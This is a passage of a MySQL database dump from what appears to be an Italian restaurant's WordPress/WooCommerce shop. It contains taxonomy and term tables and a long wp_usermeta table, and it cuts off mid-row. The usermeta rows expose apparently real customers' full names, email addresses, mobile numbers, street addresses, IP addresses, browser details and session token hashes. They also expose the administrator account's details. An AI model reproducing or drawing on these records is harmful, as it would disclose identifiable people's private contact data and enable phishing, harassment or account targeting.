,'',0,6),(64,64,'restaurant-menu-category','',0,5),(65,65,'product_cat','',0,6),(66,66,'product_cat','',0,5),(67,67,'product_cat','',0,5),(68,68,'product_cat','',0,5),(69,69,'product_cat','',0,5),(70,70,'nav_menu','',0,220),(71,71,'nav_menu','',0,273),(72,72,'nav_menu','',0,101),(73,73,'nav_menu','',0,116),(74,74,'nav_menu','',0,493),(75,75,'post_format','',0,1),(76,76,'post_format','',0,1),(77,77,'post_format','',0,1),(78,78,'post_format','',0,1),(79,79,'post_format','',0,1),(80,80,'nav_menu','',0,4),(81,81,'nav_menu','',0,3),(82,82,'masonry-gallery-category','',0,1),(83,83,'portfolio-category','',0,1),(84,84,'portfolio-category','',0,1),(85,85,'portfolio-category','',0,1),(86,86,'portfolio-tag','',0,1),(87,87,'portfolio-tag','',0,1),(88,88,'portfolio-tag','',0,1),(89,89,'portfolio-tag','',0,0);
/*!40000 ALTER TABLE `wp_term_taxonomy` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_termmeta`
--

DROP TABLE IF EXISTS `wp_termmeta`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_termmeta` (
  `meta_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `term_id` bigint(20) unsigned NOT NULL DEFAULT '0',
  `meta_key` varchar(255) DEFAULT NULL,
  `meta_value` longtext,
  PRIMARY KEY (`meta_id`),
  KEY `term_id` (`term_id`),
  KEY `meta_key` (`meta_key`(191))
) ENGINE=MyISAM AUTO_INCREMENT=75 DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_termmeta`
--

LOCK TABLES `wp_termmeta` WRITE;
/*!40000 ALTER TABLE `wp_termmeta` DISABLE KEYS */;
INSERT INTO `wp_termmeta` VALUES (1,7,'order','0'),(2,7,'product_count_product_cat','0'),(3,8,'order','0'),(4,9,'order','0'),(5,10,'order','0'),(6,10,'product_count_product_cat','0'),(7,10,'display_type',''),(8,10,'thumbnail_id','0'),(9,11,'order','0'),(10,11,'product_count_product_cat','1'),(11,12,'order','0'),(12,12,'product_count_product_cat','7'),(13,13,'order','0'),(14,13,'product_count_product_cat','7'),(15,23,'order','0'),(16,23,'product_count_product_cat','3'),(17,23,'display_type',''),(18,23,'thumbnail_id','264'),(19,25,'order','0'),(20,25,'product_count_product_cat','1'),(21,26,'order','0'),(22,26,'product_count_product_cat','1'),(23,27,'product_count_product_cat','1'),(24,28,'order','0'),(25,28,'product_count_product_cat','4'),(26,31,'order_pa_numero-coperti','0'),(27,32,'order_pa_numero-coperti','0'),(28,33,'order_pa_numero-coperti','0'),(29,34,'order_pa_numero-coperti','0'),(30,35,'order_pa_numero-coperti','0'),(31,39,'mkdf_portfolio_category_image_meta',''),(32,42,'mkdf_portfolio_category_image_meta',''),(33,44,'mkdf_portfolio_category_image_meta',''),(34,46,'mkdf_portfolio_category_image_meta',''),(35,47,'product_count_product_tag','6'),(36,51,'mkdf_portfolio_category_image_meta',''),(37,52,'mkdf_portfolio_category_image_meta',''),(38,54,'mkdf_portfolio_category_image_meta',''),(39,56,'mkdf_portfolio_category_image_meta',''),(40,57,'product_count_product_tag','7'),(41,59,'product_count_product_tag','7'),(42,62,'order','0'),(43,62,'product_count_product_cat','0'),(44,63,'product_count_product_tag','6'),(45,65,'order','0'),(46,65,'order','0'),(47,65,'display_type',''),(48,65,'thumbnail_id','0'),(49,65,'product_count_product_cat','6'),(50,66,'order','0'),(51,66,'order','0'),(52,66,'display_type',''),(53,66,'thumbnail_id','0'),(54,66,'product_count_product_cat','5'),(55,67,'order','0'),(56,67,'order','0'),(57,67,'display_type',''),(58,67,'thumbnail_id','0'),(59,67,'product_count_product_cat','5'),(60,68,'order','0'),(61,68,'order','0'),(62,68,'display_type',''),(63,68,'thumbnail_id','0'),(64,68,'product_count_product_cat','5'),(65,69,'order','0'),(66,69,'order','0'),(67,69,'display_type',''),(68,69,'thumbnail_id','0'),(69,69,'product_count_product_cat','5'),(70,2,'mkdf_portfolio_category_image_meta',''),(71,80,'mkdf_portfolio_category_image_meta',''),(72,81,'mkdf_portfolio_category_image_meta',''),(73,85,'mkdf_portfolio_category_image_meta',''),(74,83,'mkdf_portfolio_category_image_meta','');
/*!40000 ALTER TABLE `wp_termmeta` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_terms`
--

DROP TABLE IF EXISTS `wp_terms`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_terms` (
  `term_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `name` varchar(200) NOT NULL DEFAULT '',
  `slug` varchar(200) NOT NULL DEFAULT '',
  `term_group` bigint(10) NOT NULL DEFAULT '0',
  PRIMARY KEY (`term_id`),
  KEY `slug` (`slug`(191)),
  KEY `name` (`name`(191))
) ENGINE=MyISAM AUTO_INCREMENT=90 DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_terms`
--

LOCK TABLES `wp_terms` WRITE;
/*!40000 ALTER TABLE `wp_terms` DISABLE KEYS */;
INSERT INTO `wp_terms` VALUES (1,'Eventi','eventi',0),(2,'Menu 1','menu-1',0),(3,'simple','simple',0),(4,'grouped','grouped',0),(5,'variable','variable',0),(6,'external','external',0),(7,'Capodanno','capodanno',0),(8,'2','2',0),(9,'3','3',0),(10,'GiftCoupon','buoni-coupon',0),(11,'San Valentino','san-valentino',0),(12,'Pasqua','pasqua',0),(13,'Pasquetta','pasquetta',0),(14,'exclude-from-search','exclude-from-search',0),(15,'exclude-from-catalog','exclude-from-catalog',0),(16,'featured','featured',0),(17,'outofstock','outofstock',0),(18,'rated-1','rated-1',0),(19,'rated-2','rated-2',0),(20,'rated-3','rated-3',0),(21,'rated-4','rated-4',0),(22,'rated-5','rated-5',0),(23,'Regala Cena','regala-cena',0),(24,'wgm_gift_card','wgm_gift_card',0),(25,'Coupon','coupon',0),(26,'Acquista Cena','acquista-cena',0),(27,'Caparra','caparra',0),(28,'Gift Card','mwb_wgm_giftcard',0),(29,'woocommerce-db-updates','woocommerce-db-updates',0),(30,'wc_update_product_lookup_tables','wc_update_product_lookup_tables',0),(31,'4','4',0),(32,'5','5',0),(33,'6','6',0),(34,'7','7',0),(35,'8','8',0),(36,'Healthy','healthy',0),(37,'Recepies','recepies',0),(38,'Uncategorized','uncategorized',0),(39,'Afterdinner Cocktails','afterdinner-cocktails',0),(40,'Appetizers','appetizers',0),(41,'Beer','beer',0),(42,'Cake','cake',0),(43,'Cocktails','cocktails',0),(44,'Dessert','dessert',0),(45,'Desserts','desserts',0),(46,'Drink','drink',0),(47,'Food','food',0),(48,'Food','food',0),(49,'Food','food',0),(50,'Gourmet','gourmet',0),(51,'Homemade','homemade',0),(52,'Kitchen','kitchen',0),(53,'Main Dish','maindish',0),(54,'Meals','meals',0),(55,'Meals','meals',0),(56,'New','new',0),(57,'New Dish','new-dish',0),(58,'Nice','nice',0),(59,'Specials','specials',0),(60,'Taste','taste',0),(61,'Testimonials-1','testimonials-1',0),(62,'Uncategorized','uncategorized',0),(63,'Vegan','vegan',0),(64,'Wine','wine',0),(65,'Brunch','brunch',0),(66,'Food','food',0),(67,'Main Dish','main-dish',0),(68,'Recepies','recepies',0),(69,'Restaurants','restaurants',0),(70,'Divided Left','divided-left',0),(71,'Divided Right','divided-right',0),(72,'Fullscreen Menu','fullscreen-menu',0),(73,'Left menu','left-menu',0),(74,'Main Menu (Main Navigation, Mobile Navigation)','main-menu-main-navigation-mobile-navigation',0),(75,'Video','post-format-video',0),(76,'Quote','post-format-quote',0),(77,'Link','post-format-link',0),(78,'Audio','post-format-audio',0),(79,'Gallery','post-format-gallery',0),(80,'Alto sinistra 1','alto-sinistra-1',0),(81,'Alto Destra 1','alto-destra-1',0),(82,'Cucina','cucina',0),(83,'Primi piatti','primi-piatti',0),(84,'Location','location',0),(85,'Secondi piatti','secondi-piatti',0),(86,'carne','carne',0),(87,'location','location',0),(88,'pesce','pesce',0),(89,'dolce','dolce',0);
/*!40000 ALTER TABLE `wp_terms` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_usermeta`
--

DROP TABLE IF EXISTS `wp_usermeta`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_usermeta` (
  `umeta_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `user_id` bigint(20) unsigned NOT NULL DEFAULT '0',
  `meta_key` varchar(255) DEFAULT NULL,
  `meta_value` longtext,
  PRIMARY KEY (`umeta_id`),
  KEY `user_id` (`user_id`),
  KEY `meta_key` (`meta_key`(191))
) ENGINE=MyISAM AUTO_INCREMENT=2073 DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_usermeta`
--

LOCK TABLES `wp_usermeta` WRITE;
/*!40000 ALTER TABLE `wp_usermeta` DISABLE KEYS */;
INSERT INTO `wp_usermeta` VALUES (1,1,'nickname','magnaromagna'),(2,1,'first_name','Franco'),(3,1,'last_name','Baldisserri'),(4,1,'description',''),(5,1,'rich_editing','true'),(6,1,'comment_shortcuts','false'),(7,1,'admin_color','fresh'),(8,1,'use_ssl','0'),(9,1,'show_admin_bar_front','true'),(10,1,'wp_capabilities','a:13:{s:13:\"administrator\";b:1;s:26:\"wpcf_custom_post_type_view\";b:1;s:26:\"wpcf_custom_post_type_edit\";b:1;s:33:\"wpcf_custom_post_type_edit_others\";b:1;s:25:\"wpcf_custom_taxonomy_view\";b:1;s:25:\"wpcf_custom_taxonomy_edit\";b:1;s:32:\"wpcf_custom_taxonomy_edit_others\";b:1;s:22:\"wpcf_custom_field_view\";b:1;s:22:\"wpcf_custom_field_edit\";b:1;s:29:\"wpcf_custom_field_edit_others\";b:1;s:25:\"wpcf_user_meta_field_view\";b:1;s:25:\"wpcf_user_meta_field_edit\";b:1;s:32:\"wpcf_user_meta_field_edit_others\";b:1;}'),(11,1,'wp_user_level','10'),(12,1,'dismissed_wp_pointers','wp360_locks,wp390_widgets,wp410_dfw,wp496_privacy,vc_pointers_backend_editor,text_widget_custom_html'),(13,1,'show_welcome_panel','1'),(15,1,'wp_dashboard_quick_press_last_post_id','4604'),(16,1,'wp_user-settings','libraryContent=browse&editor=html&imgsize=medium&urlbutton=none&hidetb=1&wplink=1&align=right&mfold=o&edit_element_vcUIPanelWidth=650&edit_element_vcUIPanelLeft=913px&edit_element_vcUIPanelTop=74px'),(17,1,'wp_user-settings-time','1612116351'),(18,1,'managenav-menuscolumnshidden','a:4:{i:0;s:11:\"link-target\";i:1;s:11:\"css-classes\";i:2;s:3:\"xfn\";i:3;s:11:\"description\";}'),(19,1,'metaboxhidden_nav-menus','a:3:{i:0;s:8:\"add-post\";i:1;s:12:\"add-post_tag\";i:2;s:15:\"add-post_format\";}'),(20,1,'nav_menu_recently_edited','80'),(21,1,'session_tokens','a:2:{s:64:\"a3e8cd49a05b1f6a1771690246d48ad7b60e75e08ea16876844f2aedce2753df\";a:4:{s:10:\"expiration\";i:1612119807;s:2:\"ip\";s:11:\"93.34.119.4\";s:2:\"ua\";s:115:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36\";s:5:\"login\";i:1611947007;}s:64:\"284b4465e69b35da9b56103df7c57c4c7890200f39f3b2d3f565407ccbbba168\";a:4:{s:10:\"expiration\";i:1612279380;s:2:\"ip\";s:11:\"93.34.119.4\";s:2:\"ua\";s:115:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36\";s:5:\"login\";i:1612106580;}}'),(1965,68,'first_name',''),(1966,68,'last_name',''),(1967,68,'description',''),(1968,68,'rich_editing','true'),(1969,68,'syntax_highlighting','true'),(22,2,'nickname','solymar'),(23,2,'first_name','Teo'),(24,2,'last_name',''),(25,2,'description',''),(26,2,'rich_editing','true'),(27,2,'comment_shortcuts','false'),(28,2,'admin_color','fresh'),(29,2,'use_ssl','0'),(30,2,'show_admin_bar_front','true'),(31,2,'wp_capabilities','a:1:{s:12:\"shop_manager\";b:1;}'),(32,2,'wp_user_level','9'),(33,2,'dismissed_wp_pointers','wp360_locks,wp390_widgets'),(34,2,'session_tokens','a:1:{s:64:\"882244f2aa0305f950fbc31fa428ed3bccede41e54f9a9d03d0eb275ff3e9989\";a:4:{s:10:\"expiration\";i:1604146104;s:2:\"ip\";s:14:\"151.41.196.224\";s:2:\"ua\";s:69:\"Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko\";s:5:\"login\";i:1603973304;}}'),(35,2,'wp_dashboard_quick_press_last_post_id','1129'),(36,1,'closedpostboxes_post','a:0:{}'),(37,1,'metaboxhidden_post','a:3:{i:0;s:13:\"trackbacksdiv\";i:1;s:10:\"postcustom\";i:2;s:7:\"slugdiv\";}'),(38,1,'default_password_nag',''),(39,1,'wpseo_ignore_tour','1'),(41,1,'manageedit-shop_ordercolumnshidden','a:1:{i:0;s:15:\"billing_address\";}'),(42,1,'_woocommerce_persistent_cart','a:1:{s:4:\"cart\";a:1:{s:32:\"310dcbbf4cce62f762a2aaa148d556bd\";a:9:{s:10:\"product_id\";i:333;s:12:\"variation_id\";i:0;s:9:\"variation\";a:0:{}s:8:\"quantity\";i:1;s:10:\"line_total\";d:175;s:8:\"line_tax\";d:0;s:13:\"line_subtotal\";d:175;s:17:\"line_subtotal_tax\";d:0;s:13:\"line_tax_data\";a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}}}}'),(43,1,'closedpostboxes_product','a:1:{i:0;s:10:\"wpseo_meta\";}'),(44,1,'metaboxhidden_product','a:2:{i:0;s:10:\"postcustom\";i:1;s:7:\"slugdiv\";}'),(45,1,'_yoast_wpseo_profile_updated','1611163234'),(46,2,'_yoast_wpseo_profile_updated','1611163234'),(47,3,'nickname','gionata.calzolari2012'),(48,3,'first_name','CALZOLARI Gionata'),(49,3,'last_name','Calzolari'),(50,3,'description',''),(51,3,'rich_editing','true'),(52,3,'comment_shortcuts','false'),(53,3,'admin_color','fresh'),(54,3,'use_ssl','0'),(55,3,'show_admin_bar_front','true'),(56,3,'wp_capabilities','a:1:{s:8:\"customer\";b:1;}'),(57,3,'wp_user_level','0'),(58,3,'_yoast_wpseo_profile_updated','1480491526'),(59,3,'session_tokens','a:1:{s:64:\"63f91482cd0bafc23bf7adc30eafd99ae128765b730c37ab5c7d5306c829c805\";a:4:{s:10:\"expiration\";i:1481701127;s:2:\"ip\";s:15:\"188.114.102.108\";s:2:\"ua\";s:139:\"Mozilla/5.0 (Linux; Android 4.4.4; GT-I9060I Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.124 Mobile Safari/537.36\";s:5:\"login\";i:1480491527;}}'),(61,3,'last_update','1480491527'),(62,3,'billing_first_name','CALZOLARI Gionata'),(63,3,'billing_last_name','Calzolari'),(64,3,'billing_email','gionata.calzolari2012@gmail.com'),(65,3,'billing_phone','3335731283'),(66,3,'billing_address_1','Via Roma 42'),(67,3,'billing_city','ROLO (re)'),(68,2,'wpseo_title',''),(69,2,'wpseo_metadesc',''),(70,2,'wpseo_metakey',''),(71,2,'wpseo_noindex_author',''),(72,2,'wpseo_content_analysis_disable',''),(73,2,'wpseo_keyword_analysis_disable',''),(74,2,'billing_first_name','Teo'),(75,2,'billing_last_name',''),(76,2,'billing_company',''),(77,2,'billing_address_1',''),(78,2,'billing_address_2',''),(79,2,'billing_city',''),(80,2,'billing_postcode',''),(81,2,'billing_country',''),(82,2,'billing_state',''),(83,2,'billing_phone',''),(84,2,'billing_email','teosphone@gmail.com'),(85,2,'shipping_first_name',''),(86,2,'shipping_last_name',''),(87,2,'shipping_company',''),(88,2,'shipping_address_1',''),(89,2,'shipping_address_2',''),(90,2,'shipping_city',''),(91,2,'shipping_postcode',''),(92,2,'shipping_country',''),(93,2,'shipping_state',''),(94,2,'locale',''),(95,2,'googleplus',''),(96,2,'twitter',''),(97,2,'facebook',''),(98,2,'last_update','1591629659'),(99,2,'manageedit-shop_ordercolumnshidden','a:1:{i:0;s:15:\"billing_address\";}'),(100,4,'nickname','valina_d83'),(101,4,'first_name','Valentina'),(102,4,'last_name','D\'Oria'),(103,4,'description',''),(104,4,'rich_editing','true'),(105,4,'comment_shortcuts','false'),(106,4,'admin_color','fresh'),(107,4,'use_ssl','0'),(108,4,'show_admin_bar_front','true'),(109,4,'locale',''),(110,4,'wp_capabilities','a:1:{s:8:\"customer\";b:1;}'),(111,4,'wp_user_level','0'),(112,4,'_yoast_wpseo_profile_updated','1481813709'),(113,4,'session_tokens','a:1:{s:64:\"080edd80310d3b497e7d87e69c700214597c436ddfe05d77d80594e1cafb13be\";a:4:{s:10:\"expiration\";i:1483023310;s:2:\"ip\";s:15:\"188.114.102.112\";s:2:\"ua\";s:144:\"Mozilla/5.0 (iPhone; CPU iPhone OS 10_1_1 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) GSA/21.4.141508723 Mobile/14B100 Safari/600.1.4\";s:5:\"login\";i:1481813710;}}'),(114,4,'_woocommerce_persistent_cart','a:1:{s:4:\"cart\";a:1:{s:32:\"ec8ce6abb3e952a85b8551ba726a1227\";a:9:{s:10:\"product_id\";i:220;s:12:\"variation_id\";i:0;s:9:\"variation\";a:0:{}s:8:\"quantity\";i:1;s:10:\"line_total\";d:180;s:8:\"line_tax\";i:0;s:13:\"line_subtotal\";i:180;s:17:\"line_subtotal_tax\";i:0;s:13:\"line_tax_data\";a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}}}}'),(115,4,'last_update','1481813710'),(116,4,'billing_first_name','Valentina'),(117,4,'billing_last_name','D\'Oria'),(118,4,'billing_email','valina_d83@hotmail.it'),(119,4,'billing_phone','3341800831'),(120,4,'billing_address_1',''),(121,4,'billing_city',''),(122,1,'closedpostboxes_dashboard','a:0:{}'),(123,1,'metaboxhidden_dashboard','a:3:{i:0;s:24:\"wpseo-dashboard-overview\";i:1;s:21:\"dashboard_quick_press\";i:2;s:17:\"dashboard_primary\";}'),(124,5,'nickname','ricciardone'),(125,5,'first_name','massimiliano'),(126,5,'last_name','ricciardone'),(127,5,'description',''),(128,5,'rich_editing','true'),(129,5,'comment_shortcuts','false'),(130,5,'admin_color','fresh'),(131,5,'use_ssl','0'),(132,5,'show_admin_bar_front','true'),(133,5,'locale',''),(134,5,'wp_capabilities','a:1:{s:8:\"customer\";b:1;}'),(135,5,'wp_user_level','0'),(136,5,'_yoast_wpseo_profile_updated','1486840171'),(139,5,'last_update','1486840172'),(140,5,'billing_first_name','massimiliano'),(141,5,'billing_last_name','ricciardone'),(142,5,'billing_email','ricciardone@alice.it'),(143,5,'billing_phone','3336453072'),(144,5,'billing_address_1','Via annibolina 14'),(145,5,'billing_city','San clemente Rimini'),(146,5,'_woocommerce_persistent_cart','a:1:{s:4:\"cart\";a:1:{s:32:\"48aedb8880cab8c45637abc7493ecddd\";a:9:{s:10:\"product_id\";i:288;s:12:\"variation_id\";i:0;s:9:\"variation\";a:0:{}s:8:\"quantity\";i:1;s:10:\"line_total\";d:30;s:8:\"line_tax\";i:0;s:13:\"line_subtotal\";i:30;s:17:\"line_subtotal_tax\";i:0;s:13:\"line_tax_data\";a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}}}}'),(147,5,'manageedit-shop_ordercolumnshidden','a:1:{i:0;s:15:\"billing_address\";}'),(149,6,'nickname','Lorenzob'),(150,6,'first_name','Lorenzo'),(151,6,'last_name','Bordini'),(152,6,'description',''),(153,6,'rich_editing','true'),(154,6,'comment_shortcuts','false'),(155,6,'admin_color','fresh'),(156,6,'use_ssl','0'),(157,6,'show_admin_bar_front','true'),(158,6,'locale',''),(159,6,'wp_capabilities','a:1:{s:8:\"customer\";b:1;}'),(160,6,'wp_user_level','0'),(161,6,'_yoast_wpseo_profile_updated','1486983568'),(162,6,'session_tokens','a:1:{s:64:\"6149370b893b2946edc701ffeb202666a945a032fd541bd8a3321da8f9ac1d4d\";a:4:{s:10:\"expiration\";i:1488193171;s:2:\"ip\";s:14:\"151.82.159.230\";s:2:\"ua\";s:137:\"Mozilla/5.0 (iPhone; CPU iPhone OS 10_0_2 like Mac OS X) AppleWebKit/602.1.50 (KHTML, like Gecko) Version/10.0 Mobile/14A456 Safari/602.1\";s:5:\"login\";i:1486983571;}}'),(164,6,'last_update','1486983571'),(165,6,'billing_first_name','Lorenzo'),(166,6,'billing_last_name','Bordini'),(167,6,'billing_email','Lorenzob@debsrl.com'),(168,6,'billing_phone','3484508210'),(169,6,'billing_address_1','Via Cavour 20'),(170,6,'billing_city','Misano adriatico'),(171,7,'nickname','lauraugolini87'),(172,7,'first_name','Laura'),(173,7,'last_name','Ugolini'),(174,7,'description',''),(175,7,'rich_editing','true'),(176,7,'comment_shortcuts','false'),(177,7,'admin_color','fresh'),(178,7,'use_ssl','0'),(179,7,'show_admin_bar_front','true'),(180,7,'locale',''),(181,7,'wp_capabilities','a:1:{s:8:\"customer\";b:1;}'),(182,7,'wp_user_level','0'),(183,7,'_yoast_wpseo_profile_updated','1487063487'),(184,7,'session_tokens','a:1:{s:64:\"eb5011575d7b63d5e9a46133e2cd3df901de16d8f1d2d39090461aaeb674d182\";a:4:{s:10:\"expiration\";i:1551292552;s:2:\"ip\";s:12:\"77.242.222.3\";s:2:\"ua\";s:119:\"Mozilla/5.0 (Linux; Android 9; CLT-L09) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.99 Mobile Safari/537.36\";s:5:\"login\";i:1550082952;}}'),(185,7,'_woocommerce_persistent_cart','a:1:{s:4:\"cart\";a:1:{s:32:\"48aedb8880cab8c45637abc7493ecddd\";a:9:{s:10:\"product_id\";i:288;s:12:\"variation_id\";i:0;s:9:\"variation\";a:0:{}s:8:\"quantity\";i:1;s:10:\"line_total\";d:30;s:8:\"line_tax\";i:0;s:13:\"line_subtotal\";i:30;s:17:\"line_subtotal_tax\";i:0;s:13:\"line_tax_data\";a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}}}}'),(186,7,'last_update','1550083084'),(187,7,'billing_first_name','Laura'),(188,7,'billing_last_name','Ugolini'),(189,7,'billing_email','lauraugolini87@gmail.com'),(190,7,'billing_phone','3385403481'),(191,7,'billing_address_1','strada cardio 91B'),(192,7,'billing_city','serravalle rsm'),(193,5,'session_tokens','a:1:{s:64:\"be2b32a708efbf831f31c583d3c14140140c27537022946dd8913abc6f575aec\";a:4:{s:10:\"expiration\";i:1488282703;s:2:\"ip\";s:13:\"5.168.128.184\";s:2:\"ua\";s:135:\"Mozilla/5.0 (iPhone; CPU iPhone OS 10_2_1 like Mac OS X) AppleWebKit/602.4.6 (KHTML, like Gecko) Version/10.0 Mobile/14D27 Safari/602.1\";s:5:\"login\";i:1487073103;}}'),(194,8,'nickname','francesco.turco71'),(195,8,'first_name','Francesco'),(196,8,'last_name','Turco'),(197,8,'description',''),(198,8,'rich_editing','true'),(199,8,'comment_shortcuts','false'),(200,8,'admin_color','fresh'),(201,8,'use_ssl','0'),(202,8,'show_admin_bar_front','true'),(203,8,'locale',''),(204,8,'wp_capabilities','a:1:{s:8:\"customer\";b:1;}'),(205,8,'wp_user_level','0'),(206,8,'_yoast_wpseo_profile_updated','1490293774'),(207,8,'session_tokens','a:1:{s:64:\"d4cc117b53d22fab0661f7d454681b716c3e709664756e98057e43d04f9ca492\";a:4:{s:10:\"expiration\";i:1491503375;s:2:\"ip\";s:13:\"93.34.113.118\";s:2:\"ua\";s:157:\"Mozilla/5.0 (Linux; Android 6.0.1; SAMSUNG SM-T719 Build/MMB29M) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/4.0 Chrome/44.0.2403.133 Safari/537.36\";s:5:\"login\";i:1490293775;}}'),(209,8,'last_update','1490293775'),(210,8,'billing_first_name','Francesco'),(211,8,'billing_last_name','Turco'),(212,8,'billing_email','francesco.turco71@gmail.com'),(213,8,'billing_phone','3298467775'),(214,8,'billing_address_1','Viale della Repubblica, 4'),(215,8,'billing_city','Bologna'),(216,9,'nickname','matteo.gbb'),(217,9,'first_name','Matteo'),(218,9,'last_name','Gobbi'),(219,9,'description',''),(220,9,'rich_editing','true'),(221,9,'comment_shortcuts','false'),(222,9,'admin_color','fresh'),(223,9,'use_ssl','0'),(224,9,'show_admin_bar_front','true'),(225,9,'locale',''),(226,9,'wp_capabilities','a:1:{s:8:\"customer\";b:1;}'),(227,9,'wp_user_level','0'),(228,9,'_yoast_wpseo_profile_updated','1490700200'),(229,9,'session_tokens','a:1:{s:64:\"dbf240784cb2366bb372c8ac62157ef431a337e4f6be0184aac13bd6ff030227\";a:4:{s:10:\"expiration\";i:1491909801;s:2:\"ip\";s:13:\"93.33.157.188\";s:2:\"ua\";s:119:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/534.59.10 (KHTML, like Gecko) Version/5.1.9 Safari/534.59.10\";s:5:\"login\";i:1490700201;}}'),(231,9,'last_update','1490700201'),(232,9,'billing_first_name','Matteo'),(233,9,'billing_last_name','Gobbi'),(234,9,'billing_email','matteo.gbb@gmail.com'),(235,9,'billing_phone','3392854860'),(236,9,'billing_address_1','via A.Ghisleri 35/H'),(237,9,'billing_city','Piacenza'),(238,10,'nickname','davide.perni'),(239,10,'first_name','DAVIDE'),(240,10,'last_name','PERNI'),(241,10,'description',''),(242,10,'rich_editing','true'),(243,10,'comment_shortcuts','false'),(244,10,'admin_color','fresh'),(245,10,'use_ssl','0'),(246,10,'show_admin_bar_front','true'),(247,10,'locale',''),(248,10,'wp_capabilities','a:1:{s:8:\"customer\";b:1;}'),(249,10,'wp_user_level','0'),(250,10,'_yoast_wpseo_profile_updated','1490819574'),(251,10,'session_tokens','a:1:{s:64:\"4e99de944a6c43fe1511cc9d3f21f1a42a44873255bc61fc3f46fd229c79e8ac\";a:4:{s:10:\"expiration\";i:1492029174;s:2:\"ip\";s:12:\"79.44.144.66\";s:2:\"ua\";s:68:\"Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko\";s:5:\"login\";i:1490819574;}}'),(253,10,'last_update','1490819574'),(254,10,'billing_first_name','DAVIDE'),(255,10,'billing_last_name','PERNI'),(256,10,'billing_email','davide.perni@ducati.com'),(257,10,'billing_phone','3337368152'),(258,10,'billing_address_1','via Cadriano 79/50'),(259,10,'billing_city','Granarolo dell\'Emilia (BO)'),(260,11,'nickname','maccagnani.piero'),(261,11,'first_name','Piero'),(262,11,'last_name','Maccagnani'),(263,11,'description',''),(264,11,'rich_editing','true'),(265,11,'comment_shortcuts','false'),(266,11,'admin_color','fresh'),(267,11,'use_ssl','0'),(268,11,'show_admin_bar_front','true'),(269,11,'locale',''),(270,11,'wp_capabilities','a:1:{s:8:\"customer\";b:1;}'),(271,11,'wp_user_level','0'),(272,11,'_yoast_wpseo_profile_updated','1491147144'),(273,11,'session_tokens','a:1:{s:64:\"73c309656f2f7c156ce80d0c844274dc02eed694747c027bc04428c5d5efc5da\";a:4:{s:10:\"expiration\";i:1492356744;s:2:\"ip\";s:11:\"2.234.219.3\";s:2:\"ua\";s:121:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36\";s:5:\"login\";i:1491147144;}}'),(274,11,'_woocommerce_persistent_cart','a:1:{s:4:\"cart\";a:1:{s:32:\"5737c6ec2e0716f3d8a7a5c4e0de0d9a\";a:9:{s:10:\"product_id\";i:322;s:12:\"variation_id\";i:0;s:9:\"variation\";a:0:{}s:8:\"quantity\";i:1;s:10:\"line_total\";d:50;s:8:\"line_tax\";i:0;s:13:\"line_subtotal\";i:50;s:17:\"line_subtotal_tax\";i:0;s:13:\"line_tax_data\";a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}}}}'),(275,11,'last_update','1491147144'),(276,11,'billing_first_name','Piero'),(277,11,'billing_last_name','Maccagnani'),(278,11,'billing_email','maccagnani.piero@gmail.com'),(279,11,'billing_phone','3395738260'),(280,11,'billing_address_1','via Andrea Costa 127, 40134'),(281,11,'billing_city','Bologna'),(282,12,'nickname','Edoardozona'),(283,12,'first_name','Edoardo'),(284,12,'last_name','Zona'),(285,12,'description',''),(286,12,'rich_editing','true'),(287,12,'comment_shortcuts','false'),(288,12,'admin_color','fresh'),(289,12,'use_ssl','0'),(290,12,'show_admin_bar_front','true'),(291,12,'locale',''),(292,12,'wp_capabilities','a:1:{s:8:\"customer\";b:1;}'),(293,12,'wp_user_level','0'),(294,12,'_yoast_wpseo_profile_updated','1491596959'),(295,12,'session_tokens','a:1:{s:64:\"a179e81d1b6f5a3fd8a1826a3a82fc7357f032620394dfed6b643bba2156945a\";a:4:{s:10:\"expiration\";i:1492806560;s:2:\"ip\";s:11:\"5.90.63.112\";s:2:\"ua\";s:143:\"Mozilla/5.0 (iPhone; CPU iPhone OS 10_1_1 like Mac OS X) AppleWebKit/602.1.50 (KHTML, like Gecko) GSA/24.1.151204851 Mobile/14B100 